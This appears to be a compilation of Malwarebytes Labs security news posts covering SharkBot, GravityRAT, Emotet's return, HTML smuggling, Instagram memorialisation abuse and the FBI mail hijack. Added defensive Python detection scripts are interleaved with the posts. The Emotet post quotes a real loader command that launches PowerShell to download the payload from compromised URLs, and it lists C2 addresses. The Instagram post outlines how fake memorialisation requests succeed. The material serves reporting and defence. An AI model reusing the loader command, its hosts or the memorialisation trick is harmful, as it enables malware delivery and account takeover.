IT NEWS

SharkBot Android banking Trojan cleans users out

Researchers have discovered and analyzed a new Android banking Trojan that allows attackers to steal sensitive banking information such as user credentials, personal information, current balance, and even to perform gestures on the infected device.

According to the researchers, SharkBot demonstrates:

“…how mobile malwares are quickly finding new ways to perform fraud, trying to bypass behavioural detection countermeasures put in place by multiple banks and financial services during the last years.”

Type and source of the infection

A banking Trojan is a type of Trojan specifically created to harvest credentials and other sensitive financial and personal information stored and processed through online banking systems. This particular one, dubbed SharkBot by the researchers, goes beyond that and uses an Automatic Transfer System (ATS) technique to automate the process of stealing funds from users’ accounts.

ATS allows attackers to automatically fill in fields on an infected device with minimal human input. It launches an autofill service to facilitate fraudulent money transfers through legitimate financial service apps. SharkBot uses this technique to bypass behavioral analytics, biometric checks, and multi-factor authentication (MFA).

SharkBot isn’t available in the Google Play Store, so the threat actors have to convince victims to sideload the app onto their device. Sideloading means installing an app from an APK file obtained outside the app store, for example from a link in a message or a download site. It does not require root access: on a standard Android phone the user only has to allow installs from unknown sources (or from the specific browser or file manager doing the install) when prompted, which is exactly why social engineering is enough to get malware like this onto a device.

Apps like these are often offered for download masquerading as a media player, live TV, or data recovery apps.

Android Accessibility service

In order to use ATS, the Trojan needs access to the Android Accessibility Service. So once SharkBot is installed, the malware asks the user to grant it access to the Accessibility Service, a feature designed to help users with disabilities interact with their devices by reading screen content and performing actions on their behalf. SharkBot abuses that access to perform tasks such as:

  • Overlay attacks against multiple applications to steal login credentials and credit card information. An overlay is a window the malware draws on top of the legitimate app: either a fake login form that captures whatever the victim types, or a benign-looking pop-up placed over a sensitive prompt so the victim taps “through” it and performs an action the attacker wants (such as accepting a permission)
  • Intercept and/or hide SMS messages. This feature is mostly used to capture the MFA codes that banks send by text message
  • Keylogging, for example to record and send typed passwords to the attacker
  • Obtain full remote control of an Android device
  • Bypass Android’s Doze battery-saving mode, which would otherwise restrict an idle app’s network access, and stay connected to the C2 servers

Once the malicious app has been installed, no icon is displayed on the device, and SharkBot grants itself every further permission it needs through the Accessibility Service: whenever Android shows a permission prompt to the user, the malware clicks through it instantly on the user’s behalf.
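The permission combination described above is visible statically, before the app ever runs. The script below is an added example, not part of the article or of any SharkBot analysis: it inspects a decoded AndroidManifest.xml (the form apktool produces) for an accessibility service declaration alongside SMS, overlay and battery-optimisation permissions, and flags that combination. The manifest is constructed for illustration, and the package and service names are made up.

```python
"""Static triage of a decoded Android manifest for the accessibility-service
plus SMS/overlay combination that SharkBot-style bankers rely on.
Added example; the manifest is constructed, not SharkBot's real manifest."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample: a sideloaded "media player" that is really a banker.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.mediaplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <application android:label="Media Player">
    <service android:name=".SvcA11y"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
             android:exported="true">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Capabilities from the article, mapped to the manifest entries that enable them.
CAPABILITIES = {
    "sms_interception": {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"},
    "overlay": {"android.permission.SYSTEM_ALERT_WINDOW"},
    "doze_bypass": {"android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"},
}


def _attr(elem, name):
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def requested_permissions(root):
    return {_attr(e, "name") for e in root.iter("uses-permission")}


def declares_accessibility_service(root):
    """True if any <service> is bindable by Android's accessibility framework."""
    for svc in root.iter("service"):
        if _attr(svc, "permission") == "android.permission.BIND_ACCESSIBILITY_SERVICE":
            return True
        for action in svc.iter("action"):
            if _attr(action, "name") == "android.accessibilityservice.AccessibilityService":
                return True
    return False


def triage_manifest(manifest_xml):
    """Return the capabilities found and a verdict for the manifest."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(root)
    findings = []
    a11y = declares_accessibility_service(root)
    if a11y:
        findings.append("accessibility_service")
    for cap, needed in CAPABILITIES.items():
        if needed & perms:
            findings.append(cap)
    # Heuristic: an accessibility service plus SMS or overlay capability in an
    # app that is not an accessibility tool is the banker pattern described above.
    risky = a11y and bool({"sms_interception", "overlay"} & set(findings))
    return {
        "package": root.get("package"),
        "findings": sorted(findings),
        "verdict": "suspicious" if risky else "benign-looking",
    }


if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
```

Run it on a manifest decoded from the APK under analysis; an accessibility service in an app whose purpose has nothing to do with accessibility deserves a closer look on its own, and combined with SMS or overlay permissions it is the pattern described above.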

Targets

Analysis of the samples revealed 22 different targets, including international banks from the UK and Italy and five different cryptocurrency services. So far, infections have been found in the UK, Italy, and the United States. As the app appeared to be in the development stage, the number of targets is likely to grow over time.

Detection

SharkBot uses different anti-analysis and detection techniques, in particular:

  • Obfuscation to slow down static analysis and “hide” all the commands and important information used by the malware
  • Anti-emulator. When the malicious application is installed on the device, it checks whether the device is an emulator or a real phone
  • Modular, in that it uses an external ATS module. Once installed, the malware downloads an additional module from the C2. The external module is a “.jar” file that contains all the functionality used to perform the ATS attacks, so this functionality cannot be found by analyzing the APK alone
  • Hides the app’s icon from the device screen
  • Anti-delete. Like other malware, SharkBot uses the Accessibility Service to prevent the user from uninstalling the malicious application from Settings
  • Encrypted communication. All communication between the malware and its C2 is encrypted and then Base64-encoded. In addition, SharkBot uses a domain generation algorithm (DGA) to derive C2 domains rather than relying on a fixed list

Malwarebytes detects SharkBot as Android/Trojan.BankBot.SHRK.

Stay safe, everyone!

The post SharkBot Android banking Trojan cleans users out appeared first on Malwarebytes Labs.

SoNot SoSafe: Android malware disguises itself as secure messaging app

If you haven’t heard of SoSafe Chat, you will now.

This Android app, which purports to be a secure messaging application that uses end-to-end encryption, is the latest ruse cybercriminals have put in front of smartphone users, particularly those based in India, to infect their devices with GravityRAT, a piece of malicious software known to spy on people and steal their data.

According to Cyble Research Labs, the latest version of GravityRAT can now track locations of its targets, exfiltrate cellular network data, and record audio. Below is the complete list of GravityRAT’s malicious behavior:

  • Read SMS, call logs, and contacts data
  • Change or modify system settings
  • Read current cellular network information, the phone number and the serial number of the victim’s phone, the status of any ongoing calls, and a list of any phone accounts registered on the device
  • Read or write the files on the device’s external storage
  • Record audio
  • Get connected network information
  • Get the device’s location

The history of GravityRAT

This remote access Trojan (RAT) was first discovered in infected Windows computers in 2017 by the Indian Computer Emergency Response Team (CERT-IN), but it has been active since at least 2015. An advanced persistent threat (APT) group with origins in Pakistan was believed to be behind the creation and initial attacks using the RAT.

CERT-IN had described GravityRAT as “unlike most malware, which are designed to inflict short term damage. It lies hidden in the system that it takes over and keeps penetrating deeper. According to latest inputs, GravityRAT has now become self aware and is capable of evading several commonly used malware detection techniques.”

Knowing India and Pakistan’s longstanding historical and political conflict, it’s no surprise to see GravityRAT coming back to target high profile individuals in India once more. The first time threat actors attempted this was when they homed in on the Indian armed forces in 2018.

The SoSafe Chat website and download page hosted on sosafe[dot]co[dot]in, an Indian domain.

SoSafe markets itself as an encrypted message platform that worries about the security of its users.

SoSafe chat is not just another chat application, but an application that encrypts your messages whether it is text, images, voice notes, videos. “SoSafe” is available to talk to your loved ones when all the other applications secretly steal your chat data even when they say they do not. We at “SoSafe” ensure that the security of our customers remains our top priority. Be safe with “SoSafe”.

— SoSafe Chat website marketing blurb

BleepingComputer thinks that the above website “likely played a role in the distribution of the app”, and that users are likely to be directed to it via malvertising and other known means such as social media and instant messages.

It’s also likely that targeted users were messaged privately, since quick searches on top social media sites turned up empty.

How to stay safe

This is a good time to remind readers to never download apps from sites you haven’t heard about. It’s still much, much safer to download apps from the Google Play Store. Just make sure you enable Google Play Protect before you download apps.

Lastly, if you use an antivirus for your Android device, always make sure you are using the latest version.

Stay safe!

The post SoNot SoSafe: Android malware disguises itself as secure messaging app appeared first on Malwarebytes Labs.

When renting a hitman online goes horribly wrong

You might think looking up an illegal act online, and then visiting a website claiming to be all about doing said act, would be a huge mistake. Nobody would do this, right? Right?

It’s too wild to contemplate. You can barely move online for warnings about tracking or tracing. Even your web browser tells you when your activities aren’t hidden from your ISP or people running the network. As we’re about to see, lots of people simply don’t notice, or understand, such warnings. They just know they need someone to pay the price in a hurry.

As Europol said last week, some of the nastiest aspects in this realm lurk on the dark web – from threats of violence and exploitation, to drugs and criminal market services, they’re all there somewhere.

However…

Those folks I mentioned who don’t realise the massive problems they’re about to stumble into? They will go on the plain old internet and call up all manner of dubious sites and services without a second thought. Some will look for drugs. A few might want guns.

Others will take the elevator straight to the top floor of Disastrous Life Choices Incorporated.

Of websites and hitmen

A Michigan resident, Wendy Lynn Wein, has pleaded guilty and faces up to 9 years in prison for trying to have her ex-husband murdered via a hitman website. 

The hitman website was not in fact ready to cater to all her stealth assassination needs. It was a fakeout. Unbeknown to the would-be hitman hirer, she left a message of requirements along with a pseudonym.

This wasn’t enough to save her from the long arm of the law, however. The site owner contacted local law enforcement, and they sprang into action.

Shady meetings in a cafe might seem like a good idea, but probably not when the hitman sitting opposite you is an undercover detective. Wein explained what she wanted doing, and told the detective the potential victim’s work/home address and work schedule. She also offered up to $5,000 for the dirty deed, and then to seal the “Oh no, what have you done” deal handed over $200 as a downpayment.

A land of domain confusion: Part 1

I thought it’d be interesting to trace the legacy of the hitman website. How long had it been around for? Was it always used in this way? Unfortunately, things took a strange turn after digging into the URL mentioned on some news sites.

What I assumed was the hitman site has been around since at least 2004. Back then, it was redirected to a .(ru) domain. After that, it seems to have alternated between a blank page or one of those ad-laden search portals when the owner isn’t making use of the URL or it’s expired. It seems to have remained like that all the way up to the last couple of years. The final entry for the site on Internet Archive still shows an unused domain as recently as 2018.

There is no archiving of its most recent incarnation, most likely because the owner set it to not be indexed in some way (or it didn’t get scraped by the Archive’s crawlers in time).

Or, at least, that’s what I thought. Multiple news portals list the domain as rent-a-hitman(dot)com. That’s the URL I’ve just been describing via Internet Archive.

Guess what? That’s the wrong website!

A land of domain confusion: part 2

One news portal references some of the text from the alleged website and mentions a “point and click solution”, along with the site being compliant with the “Hitman Information Privacy and Protection Act of 1964”. This is a jokey reference to HIPPA, which all but the most observant of visitors would miss.

If you go hunting for this in various search engines, it returns the website rentahitman(dot)com. Notice the lack of hyphens! This is definitely the correct website.

It contains not only the HIPPA joke above, but lots of other fun features including a “merchandise coming soon” banner, the claim of more than “17,985 US based field operatives”, and the wonderful statement that “The dark web is not safe, but RAH is”. They even throw in a “Capisce”, just to stress the silliness of it all.

I did chuckle at the classic “Has your credit card been stolen on the internet” ad on the front page, complete with a fake card number entry box which simply redirects to the Internet Crime Complaint Center.

A slight diversion, then, but a good cautionary tale to make sure the URLs referenced in the news are the right ones. This seems even more important when talking about websites which may or may not provide assassination services.

The genesis of Rent A Hitman

How and why did this website come to be, you may ask. Well, this tale stretches back to at least July 2019. The creator, Bob Innes, set it up as a play on words (website page visit “hits”, as opposed to baffling acts of murder). After a while he had no use for it, and nobody wanting to purchase the URL. He bought the domain in 2005, so weirdly it isn’t that far off from the domain wrongly flagged as the genuine Rent a Hitman site.

Soon finding his email buried (best choice of words?) in hundreds of assassination requests, he took action on one in particular which seemed pretty insistent about having someone killed. A quick conversation with a law enforcement friend and an arrest later, and Rent a Hitman was suddenly in business as the Anti-Hitman Hitman Portal. Or something along those lines.

You’d think being so overt about the joke-laden website would ruin the objective of “save lives by preventing murders” and yet, as he notes, the requests keep rolling in. He’s able to direct dubious requests to law enforcement, and highlight how easily people will turn to bad actions at the same time.

That’s quite the talent, and it’s one we hope Bob will keep on using for a long time to come.

The post When renting a hitman online goes horribly wrong appeared first on Malwarebytes Labs.

TrickBot helps Emotet come back from the dead

Probably one of the best known threats of the past several years, Emotet has always been under intense scrutiny from the infosec community. On several occasions it appeared to take an early retirement, but each time it came back.

However, when multiple law enforcement agencies seized control of its botnet and took it down in January 2021, confidence was much higher that Emotet and the people behind it had finally called it quits. Not only had the infrastructure been dismantled, but previously infected computers had received a special update that removed the malware on a specific date.

Out of the woods again

On November 15, security researchers who’ve tracked Emotet announced that the threat was back. Emotet’s long-time partner in crime TrickBot was helping it out by using already infected machines to download the new Emotet binary.

To prove this was no hiccup, malspam campaigns distributing Emotet resumed as well with the classic Office document lures containing macros.


These documents with extension .doc(m) and .xls(m) are the initial loader that will call out to one of several compromised websites to retrieve the Emotet payload proper using the following command:

C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c start /B powershell $dfkj=$strs=http://visteme.mx/shop/wp-admin/PP,https://newsmag.danielolayinkas.com/content/nVgyRFrTE68Yd9s6,http://av-quiz.tk/wp-content/k6K,http://ranvipclub.net/pvhko/a,https://g

After execution, Emotet will talk to its command and control (C2) servers and await further instructions.

A return of malspam waves and ransomware?

So far everything indicates that Emotet has restarted its successful enterprise. We should expect malspam campaigns to ramp up in the coming weeks.

In the past month there have been a number of arrests of ransomware operators, along with the creation of task forces collaborating across borders. The return of Emotet could very well mean an increase in ransomware attacks.

Malwarebytes users are already protected against Emotet thanks to our anti-exploit layer blocking the malicious documents from downloading their payload.


Indicators of Compromise (IOCs)

Emotet C2 servers:

103[.]75[.]201[.]2
103[.]8[.]26[.]102
103[.]8[.]26[.]103
104[.]251[.]214[.]46
138[.]185[.]72[.]26
178[.]79[.]147[.]66
185[.]184[.]25[.]237
188[.]93[.]125[.]116
195[.]154[.]133[.]20
207[.]38[.]84[.]195
210[.]57[.]217[.]132
212[.]237[.]5[.]209
45[.]118[.]135[.]203
45[.]142[.]114[.]231
45[.]76[.]176[.]10
51[.]68[.]175[.]8
58[.]227[.]42[.]236
66[.]42[.]55[.]5
81[.]0[.]236[.]93
94[.]177[.]248[.]64
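To use the list above operationally, the defanged addresses have to be refanged and then matched against telemetry. The following is an added example, not code from the Malwarebytes post: it refangs a few of the C2 addresses above and the first two staging URLs from the loader command quoted earlier, then matches them against constructed proxy and process-creation log lines. The log formats, the hunt for cmd.exe launching “start /B powershell” under an Office parent, and the function names are my own assumptions; the full IOC list pastes in the same way.

```python
"""Refang the defanged IOCs above and match them against proxy and endpoint
logs. Added example; the log lines are constructed, not real telemetry."""
import re

# A few of the C2 addresses as published (defanged with [.]), pasted verbatim.
DEFANGED_C2 = """
103[.]75[.]201[.]2
103[.]8[.]26[.]102
45[.]142[.]114[.]231
81[.]0[.]236[.]93
"""

# Two of the payload-staging URLs from the loader command above, defanged.
DEFANGED_URLS = [
    "hxxp://visteme[.]mx/shop/wp-admin/PP",
    "hxxps://newsmag[.]danielolayinkas[.]com/content/nVgyRFrTE68Yd9s6",
]


def refang(ioc):
    """Undo common defanging: [.] / (.) -> ., [:] -> :, hxxp(s) -> http(s)."""
    return (ioc.strip()
            .replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


C2_IPS = {refang(line) for line in DEFANGED_C2.splitlines() if line.strip()}
STAGING_HOSTS = {re.match(r"https?://([^/]+)", refang(u)).group(1) for u in DEFANGED_URLS}

# cmd.exe launching a backgrounded PowerShell, as in the loader command above,
# is only interesting when the parent is an Office application.
LOADER_CMD = re.compile(r"cmd\.exe.*\bstart\s+/B\s+powershell", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe"}

# Constructed sample logs (assumed formats):
#   proxy:   "<ts> <src_ip> <dst_ip> <host or ->"
#   process: "<ts> <parent_image> <child_image> <command line>"
PROXY_LOG = """
2021-11-16T10:01:02Z 10.0.0.5 104.18.1.1 www.microsoft.com
2021-11-16T10:02:11Z 10.0.0.7 45.142.114.231 -
2021-11-16T10:02:15Z 10.0.0.7 198.51.100.9 newsmag.danielolayinkas.com
"""
PROCESS_LOG = """
2021-11-16T10:02:09Z winword.exe cmd.exe C:\\Windows\\System32\\cmd.exe /c start /B powershell $x=1
2021-11-16T10:05:00Z explorer.exe cmd.exe C:\\Windows\\System32\\cmd.exe /c dir
"""


def match_proxy(log):
    """Return (ts, src, label, indicator) for lines touching C2 or staging hosts."""
    hits = []
    for line in log.strip().splitlines():
        ts, src, dst, host = line.split(maxsplit=3)
        if dst in C2_IPS:
            hits.append((ts, src, "emotet_c2", dst))
        elif host in STAGING_HOSTS:
            hits.append((ts, src, "emotet_staging", host))
    return hits


def match_process(log):
    """Return (ts, parent, label, cmdline) for Office-spawned loader commands."""
    hits = []
    for line in log.strip().splitlines():
        ts, parent, child, cmdline = line.split(maxsplit=3)
        if parent.lower() in OFFICE_PARENTS and LOADER_CMD.search(cmdline):
            hits.append((ts, parent, "emotet_loader", cmdline))
    return hits


if __name__ == "__main__":
    for hit in match_proxy(PROXY_LOG) + match_process(PROCESS_LOG):
        print(hit)
```

The process-creation match is the more durable of the two checks: C2 addresses rotate, but a Word or Excel process spawning cmd.exe that backgrounds PowerShell is the loader behaviour itself.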

The post TrickBot helps Emotet come back from the dead appeared first on Malwarebytes Labs.

Instagram’s memorialize feature abused to memorialize…Instagram’s boss

The mechanisms for memorialising the social network accounts of people who’ve died haven’t really suffered a lot of scrutiny up until now. I’ve done a fair amount of research on the processes and perils we face in the digitally deceased age.

Traditionally, the biggest issues in this space tended to be surprise returns from the beyond. When someone is definitely dead but their accounts spring back into action, it can be incredibly disturbing for their loved ones.

This happens by accident, or deliberately. Sometimes a relative with access to the account of the departed starts tweeting, or accidentally posts a message. Other times, the account is compromised and used to spam, or just troll.

A combination of weak security and the possibility of continued access to an account allows for this to happen.

What you may not be expecting, is for the process to happen in reverse.

When reports of your demise are rather premature…

What if you’re able to convince a platform that someone who is alive and well has actually passed on?

This issue has faced multiple individuals over the past month, but the tale has an additional twist: In this specific case, we don’t have a regular social media user finding out a random platform thinks they’ve died. We have the head of Instagram locked out of their own Instagram account, because somebody exploited its memorialisation feature.

Well, I promised you a twist.

What is Instagram’s memorialization feature?

Instagram’s memorialization feature is a way to preserve the digital legacy of a user for friends and family. As per Instagram’s FAQ page:

Memorialized accounts are a place to remember someone’s life after they’ve passed away. Memorialized accounts on Instagram have the following key features:

  • No one can log into a memorialized account.
  • The word Remembering will be shown next to the person’s name on their profile.
  • Posts the deceased person shared, including photos and videos, stay on Instagram and are visible to the audience they were shared with.
  • Memorialized accounts don’t appear in certain places on Instagram, like Explore.

Once memorialized, no one will be able to make changes to any of the account’s existing posts or information. This means no changes to the following:

  • Photos or videos added by the person to their profile.
  • Comments on posts shared by the person to their profile.
  • Privacy settings of their profile.
  • The current profile photo, followers or people the person follows.

This is one of the more strict, locked down approaches I’ve seen in this realm. Some sites allow people to continue posting, or make updates. This is particularly the case if the deceased is a known public figure, or the spokesperson for a person, charity or other organisation. In those cases, a close relative may be allowed to continue posting. That isn’t the case here, and the account is indeed memorialised in every sense of the word.

Checks and balances

Instagram doesn’t mention what checks it makes to ensure nothing suspicious takes place, but it does say it has fewer people available to review memorialization reports due to COVID. It’s possible this also impacted what happened next.

Fake memorial pages aren’t a new phenomenon. Convincing someone at an organisation that their reasonably public-facing boss is dead, feels a bit fresher.

This is the situation Adam Mosseri found himself in after a scammer convinced Instagram support that Mosseri was dead. All it took was a fake memorial, easily thrown together online or via the DIY route. As Instagram requires a death certificate or an obituary/news article, the latter was all it took to ease the scam through in September of this year.

The reports on this don’t say how long he was locked out for, except that it was resolved “quickly”.

For unverified, regular users, the person behind these tactics doesn’t even need to whip up a fake notice. They simply grab a recent genuine online obituary of somebody with the same name. As long as the obituary is from the same week as the bogus memorialization request, “98%” of the time it goes through within one to two days.

Paying the piper

This tactic does of course involve money, with “most requests” coming from paying customers. We don’t know if this particular incident was a paid request or just a way to make the tactic more visible. Getting people banned from services is another trick which was popular back in the days of Myspace, and it remains so to this day.

Discovering a contact online has died is a profound shock. If someone manages to switch an account to some form of memorial page, the impact is immediate for both people who see it and the person themselves.

Tightening up the process?

It’s possible services may have to become a little more strict about the evidence required for memorializing accounts. Perhaps more pieces of evidence, or genuine links online which corroborate the request. Of course, asking for specific services as proof only will likely exclude many people. What if those services are only available in certain regions? How about the cost…will folks be priced out in this new digital world of verified death?

It remains to be seen, but this story is a good reminder that scammers will target absolutely anything they can to get the job done. It’s up to the services we use to find new ways to be ever more vigilant and keep our digital identities ticking over for the time being.

The post Instagram’s memorialize feature abused to memorialize…Instagram’s boss appeared first on Malwarebytes Labs.

Evasive maneuvers: HTML smuggling explained

Microsoft Threat Intelligence Center (MSTIC) last week disclosed “a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features” that it calls HTML smuggling.

HTML smuggling has been used in targeted, spear-phishing email campaigns that deliver banking Trojans (such as Mekotio), remote access Trojans (RATs) like AsyncRAT/NJRAT, and Trickbot. These are malware that aid threat actors in gaining control of affected devices and delivering ransomware or other payloads.

MSTIC said the technique was used in a spear-phishing attack by the notorious NOBELIUM, the threat actor behind the noteworthy, nation-state cyberattack on SolarWinds.

How HTML smuggling works

An overview of HTML smuggling (Source: Microsoft)

What is HTML smuggling?

HTML smuggling got its name from the way attackers smuggle in, or hide, an encoded malicious JavaScript blob within an HTML email attachment. Once a user receives the email and opens the attachment, their browser runs the script, which decodes the blob and assembles the malware payload on the affected computer or host device.

Usually, malware payloads go through the network when someone opens a malicious attachment or clicks a malicious link. In this case, the malware payload is created within the host. This means that it bypasses email filters, which usually look for malicious attachments.

HTML smuggling is a particular threat to an organization’s network because it bypasses the customary security controls aimed at filtering content. Even an organization that has disabled the automatic execution of JavaScript within its environment, which would stop the JavaScript blob from running, can still be affected, because there are multiple ways to implement the technique. According to MSTIC, obfuscation and the many ways JavaScript can be written let it evade conventional JavaScript filters.

HTML smuggling isn’t new, but MSTIC notes that many cybercriminals are embracing its use in their own attack campaigns. “Such adoption shows how tactics, techniques, and procedures (TTPs) trickle down from cybercrime gangs to malicious threat actors and vice versa … It also reinforces the current state of the underground economy, where such TTPs get commoditized when deemed effective.”

Some ransomware gangs have already started using this new delivery mechanism, and this could be early signs of a fledgling trend. Even organizations confident with their perimeter security are called to double back and take mitigation steps to detect and block phishing attempts that could involve HTML smuggling. As we can see, disabling JavaScript is no longer enough.

A sample of an email that uses HTML smuggling. This is part of a Trickbot spear-phishing campaign. (Source: Microsoft)

Staying secure against HTML smuggling attacks

A layered approach to security is needed to successfully defend against HTML smuggling. Microsoft suggests killing the attack chain before it even begins. Start off by checking for common characteristics of HTML smuggling campaigns by applying behavior rules that look for:

  • an HTML file containing a suspicious script
  • an HTML file containing obfuscated JavaScript
  • an HTML file that decodes Base64-encoded JavaScript
  • a ZIP file email attachment containing JavaScript
  • a password-protected attachment
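The behaviour rules above can be implemented statically over the attachment text. The script below is an added example, not Microsoft’s or Malwarebytes’ tooling: it flags the JavaScript patterns a smuggling page needs (Base64 decoding, Blob construction, a triggered download), then carves every long Base64 run, decodes it and identifies it by magic bytes, which tells an analyst what was smuggled without opening the attachment in a browser. The sample attachment is constructed, its “payload” is a harmless zip-style header, and the indicator names and scoring threshold are my own assumptions.

```python
"""Static checks for HTML-smuggling attachments, implementing the behaviour
rules above. Added example; the sample attachment is constructed and its
payload is a harmless zip-style header, not malware."""
import base64
import re

# JavaScript a smuggling page needs: decode Base64 in the browser, build a
# Blob, trigger a download (msSaveOrOpenBlob / <a download> / object URL).
INDICATORS = {
    "decodes_base64": re.compile(r"\batob\s*\(|\bbase64\b", re.I),
    "builds_blob": re.compile(r"new\s+Blob\s*\(|Uint8Array", re.I),
    "triggers_download": re.compile(r"msSaveOrOpenBlob|\.download\s*=|createObjectURL", re.I),
    "obfuscation": re.compile(r"String\.fromCharCode|\.reverse\(\)|\\x[0-9a-f]{2}", re.I),
}
# A long Base64 run is the smuggled blob itself.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf", b"\x1f\x8b": "gzip"}


def carve_payloads(html):
    """Decode every long Base64 run and identify it by magic bytes."""
    found = []
    for m in B64_RUN.finditer(html):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except Exception:
            continue
        kind = next((k for magic, k in MAGIC.items() if data.startswith(magic)), "unknown")
        found.append((kind, len(data)))
    return found


def analyse_html(html):
    """Return matched indicators, carved payloads and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    payloads = carve_payloads(html)
    # Assumed scoring: each indicator counts 1, a recognisable embedded file counts 2.
    score = len(hits) + (2 if any(k != "unknown" for k, _ in payloads) else 0)
    return {"indicators": hits, "payloads": payloads,
            "verdict": "smuggling" if score >= 3 else "clean"}


# Constructed sample: a fake zip (valid local-file header plus padding)
# smuggled the way the article describes.
_fake_zip = b"PK\x03\x04" + b"\x00" * 300
SAMPLE_ATTACHMENT = f"""<html><body>
<script>
var b64 = "{base64.b64encode(_fake_zip).decode()}";
var bin = atob(b64);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {{type: 'application/octet-stream'}});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'invoice.zip';
a.click();
</script></body></html>"""

BENIGN_PAGE = "<html><body><p>Your invoice is attached as PDF.</p></body></html>"

if __name__ == "__main__":
    print(analyse_html(SAMPLE_ATTACHMENT))
    print(analyse_html(BENIGN_PAGE))
```

Carving the blob matters more than the regexes: obfuscation can hide the JavaScript patterns, but the payload still has to be present in the file in some decodable form, and a zip or PE header inside an “invoice” HTML attachment is hard to explain away.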

Organizations should also configure their endpoint security products to block:

  • JavaScript or VBScript from automatically running a downloaded executable file
  • Running potentially obfuscated scripts
  • Executable files from running “unless they meet a prevalence, age, or trusted list criterion”

BleepingComputer recommends other mitigating steps, such as associating JavaScript files with a text editor like Notepad. This prevents the script from actually running but would let the user view its code safely instead.

Finally, organizations must educate their employees about HTML smuggling and train them on how to respond to it properly when encountered. Instruct them to never run a file that ends in either .js or .jse as these are JavaScript files. They should be deleted immediately.

Stay safe!

The post Evasive maneuvers: HTML smuggling explained appeared first on Malwarebytes Labs.

FBI server hijacked to send up to 100,000 bogus attack mails

If you received a scary missive over the last few days from what appears to be the FBI, you’re not alone. The emails, which may have reached as many as 100,000 people, blamed a fictitious cyberattack on an innocent party. The mail read as follows:

Our intelligence monitoring indicates exfiltration of several of your virtualized clusters in a sophisticated chain attack. We tried to blackhole the transit nodes used by this advanced persistent threat actor, however there is a huge chance he will modify his attack with fastflux technologies, which he proxies trough [SIC] multiple global accelerators.

Now, if you know your way around your network or have some insight into security generally, this may already sound a little off. The typo also doesn’t help. But for anyone else, the email could be very concerning, not least because of the potential for reputation damage for them and their business!

How did this happen?

An FBI server was used to send out these mails. The server itself was a tiny link in the chain known as LEEP, the Law Enforcement Enterprise Portal. This is a “secure platform for law enforcement agencies, intelligence groups, and criminal justice entities”. It includes active shooter initiatives, blogs, forums, and a “Virtual Command Center”. Unfortunately, for a short period of time it also included bogus attack mail notifications.

The website contained a flaw that leaked one-time registration passcodes in the page’s HTML. From there, it was a short step to editing the requests the browser sent to the server and changing the text in the message subject and body fields.

The FBI has explained that the server was geared towards pushing notifications only. It isn’t part of the FBI’s corporate email network, and so no PII or other data was compromised.

The damage could have been much worse

It’s certainly embarrassing for a law enforcement service to be abused in this way. It’s also worrying for anyone who’s received the mail and isn’t yet aware it’s a fake.

We’re just lucky the aim of the game here seems to have been trolling (unless you’re the innocent party, of course. There’s definitely nothing lucky about that). Think how much more impact this could have had if the mail had come with a malicious attachment, or was part of a social engineering data harvesting extravaganza.

Once an attacker seizes control of official law enforcement comms tools the possibility for incredibly malicious activity is high. This one is all about the short sharp shock, but there’s plenty of time to think about a slow, drawn-out campaign with subtle missives and a gradual tightening of the web.

Should you ever receive what appears to be a mail warning of attacks at your organisation from law enforcement, consider phoning up and going directly to the (assumed) source. It’ll save you a lot of stress, time, and effort.

The post FBI server hijacked to send up to 100,000 bogus attack mails appeared first on Malwarebytes Labs.

A week in security (Nov 8 – Nov 14)

Last week on Malwarebytes Labs

On this week’s episode of Malwarebytes’ Lock and Code podcast, S02E21, we talked to Jess Dodson about “Why we fail at getting the cybersecurity basics right”.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (Nov 8 – Nov 14) appeared first on Malwarebytes Labs.

The importance of backing up

What does backing up something mean?

Backing up is the act of making a copy or copies of a file. These files are stored somewhere other than where the originals are located. You may only need to back up a few files, or it might be a much bigger effort. Requirements may differ greatly depending on if you’re an individual or a business.

The idea is that if the original file is damaged, breaks, is stolen, or suffers any other problem, then the backups survive the issue.

In an age of ransomware attacks, it’s crucial to back up data and essential systems. Ransomware authors have been attacking all sorts of business verticals for years and anything from infrastructure to medical systems can be targets. There are many tales of law enforcement and hospitals locked out of mission critical files and systems, leading to potentially life threatening delays and scheduled operation setbacks.

What does backing up a device mean?

Backing up a device can mean a few things and depending on the device, you may have to be very specific when you map out this process. Sometimes, this can just mean backing up certain mobile settings and functions, or options and data settings for a PC.

It can also mean simply copying everything from a particular piece of equipment, as opposed to a few files or folders. This is very common for all forms of mobile devices and laptops. Backing up the entirety of a desktop PC is often a bit more involved due to the sheer number of files. With smartphones, the primary concern is often the vast collection of precious photographs they contain.

Where do we put our backups?

One of the most important backup stumbling blocks is figuring out where to place the files being copied. This can be done locally, on an external hard drive or local server on your network. The files can also be saved in the cloud. This can cause a few headaches depending on:

  • The security practices of the cloud storage system you’re using and
  • Whether you encrypt the files and folders before you upload them.

